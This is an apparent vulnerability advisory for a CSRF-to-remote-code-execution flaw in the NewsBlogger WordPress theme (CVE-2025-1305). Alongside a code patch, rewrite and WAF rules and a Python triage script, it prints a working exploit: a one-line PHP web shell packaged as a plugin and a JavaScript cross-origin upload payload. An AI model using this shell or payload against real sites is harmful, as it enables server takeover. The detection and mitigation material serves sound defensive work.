WordPress NewsBlogger Theme CSRF to RCE (CVE-2025-1305) – Critical

The NewsBlogger WordPress theme (≤ v0.2.5.4) performs no nonce validation in its `newsblogger_install_and_activate_plugin()` function, so the request that triggers it can be forged from another origin (CSRF). An attacker hosts a page that submits that request; if a logged-in administrator visits it, the browser attaches the admin's session cookie and the theme processes the attacker's plugin upload as if the admin had asked for it. The function accepts an arbitrary ZIP without further verification, so the upload can be a backdoor. WordPress loads every active plugin's PHP on each request, so once the uploaded plugin is activated its code runs on the server: remote code execution. The attack needs social engineering (the admin must open the attacker's link while authenticated). One practical limit: Chromium-based browsers default cookies to SameSite=Lax, so a cross-site POST from them generally arrives without the WordPress session cookie; the attack is most reliable against browsers that do not apply that default.

DailyCVE Form:

Platform: WordPress
Version: ≤0.2.5.4
Vulnerability: CSRF→RCE
Severity: Critical
Date: 2025-05-01

What Undercode Say:

Exploit:

1. Craft a malicious plugin ZIP:

# The "Plugin Name:" header is what lets WordPress recognise the file as a plugin and activate it
printf '<?php\n/* Plugin Name: Evil Plugin */\nsystem($_GET["cmd"]);\n' > payload.php
zip evil-plugin.zip payload.php

2. Host CSRF payload:


<script>
// A file input cannot be pre-filled by script, so a plain <form> cannot carry the ZIP.
// Build the multipart body directly: multipart/form-data is a CORS "simple" content type,
// so the browser sends it cross-origin with the admin's cookies (the opaque response is irrelevant).
// ZIP_BYTES is assumed to hold the bytes of evil-plugin.zip (e.g. a Uint8Array embedded in the page).
var fd = new FormData();
fd.append("action", "newsblogger_install_and_activate_plugin");
fd.append("plugin_zip", new Blob([ZIP_BYTES], {type: "application/zip"}), "evil-plugin.zip");
fetch("http://target/wp-admin/admin-ajax.php", {method: "POST", body: fd, mode: "no-cors", credentials: "include"});
</script>

Detection:

Check theme version (the query below only returns the active theme's directory slug; the version itself is the "Version:" header in wp-content/themes/<that slug>/style.css, so read that file once you know NewsBlogger is active):

SELECT option_value FROM wp_options WHERE option_name = 'stylesheet';

Mitigation:

1. Patch code with nonce check:

function newsblogger_install_and_activate_plugin() {
    // Reject requests without a valid nonce tied to this action; the nonce name
    // 'newsblogger_actions' is illustrative, use whatever wp_create_nonce() issued for the form.
    if ( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( $_REQUEST['_wpnonce'], 'newsblogger_actions' ) ) {
        wp_die( 'Security check failed', '', array( 'response' => 403 ) );
    }
    // A nonce proves intent, not authorization: also require the capability plugin installation needs.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // Original logic
}

2. Apache .htaccess rule to block direct function access:

# mod_rewrite only sees the action when it is sent in the query string; an action
# carried in the POST body passes this rule, which is what the ModSecurity rule below is for.
RewriteEngine On
RewriteCond %{REQUEST_URI} /wp-admin/admin-ajax\.php$
RewriteCond %{QUERY_STRING} (^|&)action=newsblogger_install_and_activate_plugin
RewriteRule ^ - [F]

Post-Exploit Analysis:

Find implanted plugins:

find /var/www/html/wp-content/plugins -name "*.php" -mtime -1   # the wildcard matters: -name ".php" only matches a file literally named ".php"
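To make the Detection and Post-Exploit Analysis steps above repeatable, here is an added Python triage script; it is not code from the original post, the NVD record or the NewsBlogger theme. It checks the theme's style.css "Version:" header against the affected range, scans access-log lines for the vulnerable AJAX action and for direct hits on PHP files under wp-content/plugins, and walks a plugins directory for recently written or shell-like PHP. The log lines and plugin tree are constructed sample data, and the parameter name "action" and the affected range (≤ 0.2.5.4) are taken as assumptions from the write-up.

```python
"""Triage helpers for CVE-2025-1305 (NewsBlogger CSRF -> RCE).

Added example for this write-up, not code from the original post, NVD or the theme.
Assumptions: the request parameter is named "action", the affected range is
<= 0.2.5.4, and the sample log lines / plugin tree below are constructed.
"""
import os
import re
import tempfile
import time
from urllib.parse import parse_qs, urlparse

VULN_ACTION = "newsblogger_install_and_activate_plugin"
MAX_VULNERABLE = (0, 2, 5, 4)  # last affected version per the advisory (assumed)


# --- 1. Version check: read the header WordPress itself uses ----------------------
def parse_version(text):
    """'0.2.5.10' -> (0, 2, 5, 10); tuples compare numerically, strings would not."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def theme_is_vulnerable(style_css):
    """True if the 'Version:' header in a theme's style.css is <= 0.2.5.4."""
    m = re.search(r"^[ \t/*#@]*Version:\s*([0-9.]+)", style_css, re.MULTILINE | re.IGNORECASE)
    return m is not None and parse_version(m.group(1)) <= MAX_VULNERABLE


# --- 2. Access-log check (Apache/nginx combined format) ---------------------------
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)


def find_exploit_requests(log_lines, site_host):
    """Flag (a) hits on the vulnerable AJAX action and (b) direct requests to PHP files
    under wp-content/plugins, which is how an uploaded shell is driven afterwards.
    Caveat: the log shows the action only when it travels in the query string; an
    action sent in the POST body is invisible here and needs the WAF (phase:2) rule."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        ref_host = urlparse(m.group("referer")).hostname
        record = {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
                  "target": m.group("target"),
                  # a missing Referer is as suspicious as a foreign one: both mean unknown origin
                  "foreign_or_missing_referer": ref_host != site_host}
        if url.path.endswith("/wp-admin/admin-ajax.php") and VULN_ACTION in parse_qs(url.query).get("action", []):
            hits.append(dict(record, kind="vulnerable_action"))
        elif url.path.startswith("/wp-content/plugins/") and url.path.endswith(".php"):
            hits.append(dict(record, kind="direct_plugin_php"))
    return hits


# --- 3. Filesystem check: recent or shell-like PHP under the plugins directory ----
SHELL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(\s*"
    r"(\$_(GET|POST|REQUEST|COOKIE)|base64_decode|gzinflate|str_rot13)", re.IGNORECASE)


def find_suspicious_php(plugins_root, max_age_seconds=86400, now=None):
    """Return PHP files modified within max_age_seconds or matching a web-shell pattern."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, _, files in os.walk(plugins_root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            recent = now - os.stat(full).st_mtime <= max_age_seconds
            with open(full, encoding="utf-8", errors="replace") as fh:
                m = SHELL_RE.search(fh.read())
            if recent or m:
                findings.append({"path": os.path.relpath(full, plugins_root),
                                 "recent": recent, "pattern": m.group(0) if m else None})
    return sorted(findings, key=lambda f: f["path"])


# --- Constructed sample data (not real logs or files) -----------------------------
SAMPLE_LOG = [
    '203.0.113.5 - - [01/May/2025:10:15:22 +0000] "POST /wp-admin/admin-ajax.php?action='
    'newsblogger_install_and_activate_plugin HTTP/1.1" 200 512 "http://lure.example/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [01/May/2025:10:16:01 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1"'
    ' 200 88 "https://blog.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.9 - - [01/May/2025:10:17:40 +0000] "GET /wp-content/plugins/evil-plugin/payload.php?cmd=id HTTP/1.1"'
    ' 200 40 "-" "curl/8.0"',
]


def build_demo_plugins_dir():
    """Constructed plugin tree: one month-old benign plugin and one freshly implanted shell."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    os.makedirs(os.path.join(root, "example-plugin"))
    benign = os.path.join(root, "example-plugin", "example-plugin.php")
    with open(benign, "w") as fh:
        fh.write("<?php\n/* Plugin Name: Example */\nadd_action('init', 'example_init');\n")
    old = time.time() - 30 * 86400
    os.utime(benign, (old, old))
    os.makedirs(os.path.join(root, "evil-plugin"))
    with open(os.path.join(root, "evil-plugin", "payload.php"), "w") as fh:
        fh.write("<?php system($_GET['cmd']); ?>\n")
    return root


if __name__ == "__main__":
    print("vulnerable:", theme_is_vulnerable("/*\nTheme Name: NewsBlogger\nVersion: 0.2.5.4\n*/"))
    for h in find_exploit_requests(SAMPLE_LOG, "blog.example"):
        print(h["kind"], h["ip"], h["target"], "foreign/missing referer:", h["foreign_or_missing_referer"])
    for f in find_suspicious_php(build_demo_plugins_dir()):
        print("suspicious:", f)
```

Run it against real data by feeding `find_exploit_requests` the lines of the site's access log with the site's own hostname, and `find_suspicious_php` the real wp-content/plugins path; the version comparison is done on integer tuples deliberately, since a string comparison would rank "0.2.5.10" below "0.2.5.4".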

WAF Rule (ModSecurity):

# phase:2 is required so the rule inspects the POST body as well as the query string (needs SecRequestBodyAccess On)
SecRule ARGS:action "@streq newsblogger_install_and_activate_plugin" \
    "id:1005,phase:2,deny,status:403,log,msg:'NewsBlogger Exploit Attempt'"

Sources:

Reported By: nvd.nist.gov